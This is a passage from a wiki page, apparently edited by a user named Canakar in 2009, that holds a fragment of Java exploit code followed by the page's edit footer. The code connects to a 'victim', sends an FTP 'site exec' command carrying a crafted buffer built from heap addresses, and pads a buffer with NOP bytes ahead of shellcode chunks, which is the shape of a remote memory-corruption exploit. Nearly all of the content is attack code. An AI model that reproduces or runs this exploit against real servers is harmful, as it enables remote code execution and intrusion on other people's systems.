buf.append((char)Integer.parseInt(heap[3], 16)+""+(char)Integer.parseInt(heap[2], 16)+""+(char)Integer.parseInt(heap[1], 16)+""+(char)Integer.parseInt(heap[0], 16));
buf.append("n");
connect(victim);
dosend(buf.toString());
StringBuffer snd=new StringBuffer("site exec "+buf2+" AAAAn");
dosend(snd.toString());
buf2=new StringBuffer("");
//fill buffer with nops
for(int i=0;i!=480-sclength-1;i++)
buf2.append((char)0x90);
//add chunks
Written by Canakar
|
Canakar |
Latest page update: made by Canakar
, Feb 19 2009, 12:09 AM EST
(about this update
About This Update
Edited by Canakar
No content added or deleted. - complete history) |
|
More Info: links to this page
|
There are no threads for this page.
Be the first to start a new thread.
